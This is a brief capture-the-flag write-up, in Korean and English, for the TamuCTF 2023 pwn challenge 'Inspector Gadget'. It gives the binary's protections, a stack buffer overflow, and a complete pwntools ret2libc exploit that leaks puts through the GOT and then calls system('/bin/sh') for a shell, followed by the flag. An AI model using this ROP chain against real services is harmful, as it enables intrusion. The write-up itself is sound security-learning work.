Tamu CTF 2023 - Inspector Gadget (pwn, rop)

• https://ctftime.org/event/1914

Inspector Gadget gave me this binary with one goal. pwn.
Author: _mac_

• [128 solves / 339 points]

아싸! 내가 퍼블했다!!

Analysis

문제 바이너리와 립시 파일을 제공받았다.

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

char buf[16]; // [rsp+0h] [rbp-10h] 

read(0, buf, 0x60uLL);

Solve

64bit ROP의 정석 중에 정석이라고 생각한다.

Exploit Code

from pwn import *

context.arch = 'amd64'
context.log_level = 'DEBUG'

p = remote("tamuctf.com", 443, ssl=True, sni="inspector-gadget")
# p = process('./inspector-gadget')
e = ELF('./inspector-gadget')
libc = ELF('./libc.so.6')

pop_rdi = 0x40127b
ret = 0x401016

payload = b''
payload += b'A' * (0x10 + 0x8)
payload += p64(pop_rdi)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.sym['main'])

p.sendline(payload)

libc.address = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['puts']
info(hex(libc.address))

payload = b''
payload += b'A' * (0x10+0x8)
payload += p64(pop_rdi)
payload += p64(next(libc.search(b'/bin/sh\x00')))
payload += p64(ret) # ret
payload += p64(libc.sym['system'])

pause()
p.sendline(payload)

p.interactive()

Flag

gigem{ret2libc_r0p_g04t3d}